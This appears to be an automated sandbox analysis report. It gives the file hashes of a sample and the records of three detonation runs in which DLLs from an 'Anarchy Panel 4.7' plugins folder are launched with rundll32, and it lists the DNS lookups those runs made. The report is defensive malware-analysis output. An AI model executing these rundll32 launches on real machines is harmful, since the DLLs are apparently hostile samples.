C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat
| MD5 | db275cf78eed4bd3a7944879449fecc2 |
| SHA1 | fc2648932cebc6d370a57a497e402979b8ef3aaf |
| SHA256 | 629c58336b353b73ff9675ba87d8c6c13375f2b467dc799b4bd26e04789f8107 |
| SHA512 | f8e37f5fcbcf24400c6c617ad73c956b8270c462e103f52d9a4c2273ad5b9b77897fe0738dd54781914df9357aa382260dc48f2ff11a4f984e10b57ae891fe1b |
Analysis: behavioral9
Detonation Overview
Submitted
2023-07-19 00:36
Reported
2023-07-19 01:07
Platform
win7-20230712-en
Max time kernel
1563s
Max time network
1568s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\CjETR6GpGXqM.dll",#1
Network
Files
Analysis: behavioral22
Detonation Overview
Submitted
2023-07-19 00:36
Reported
2023-07-19 01:07
Platform
win10v2004-20230703-en
Max time kernel
1138s
Max time network
1146s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\RssCnLKcGRxj.dll",#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.194.73.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.78.124.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.74.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.211.229.192.in-addr.arpa | udp |
Files
Analysis: behavioral28
Detonation Overview
Submitted
2023-07-19 00:36
Reported
2023-07-19 01:07
Platform
win10v2004-20230703-en
Max time kernel
709s
Max time network
1163s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\fzAgyDYa.dll",#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.74.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.77.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.72.42.20.in-addr.arpa | udp |